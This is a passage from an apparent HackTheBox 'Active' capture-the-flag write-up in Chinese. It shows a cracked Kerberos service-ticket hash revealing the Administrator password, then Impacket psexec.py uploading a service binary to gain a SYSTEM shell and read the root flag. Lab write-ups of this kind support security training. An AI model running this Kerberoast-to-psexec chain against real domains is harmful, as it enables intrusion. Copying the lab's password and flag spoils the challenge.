$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae...ed9130e8:Ticketmaster1968
...
不知道為什麼第一次Nmap掃描有出現winrm,但沒有關係,可以如法炮製稍早取得user flag的方式,透過SMB找到root.txt
,或是用psexec.py
取得CMD。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ psexec.py active.htb/Administrator:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.122.239.....
[*] Found writable share ADMIN$
[*] Uploading file ouTWePBG.exe
[*] Opening SVCManager on 10.129.122.239.....
[*] Creating service gQQp on 10.129.122.239.....
[*] Starting service gQQp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \
C:\> cd users/administrator/desktop
C:\Users\Administrator\Desktop> type root.txt
8b074aa02cd800724b6bd39e595974a7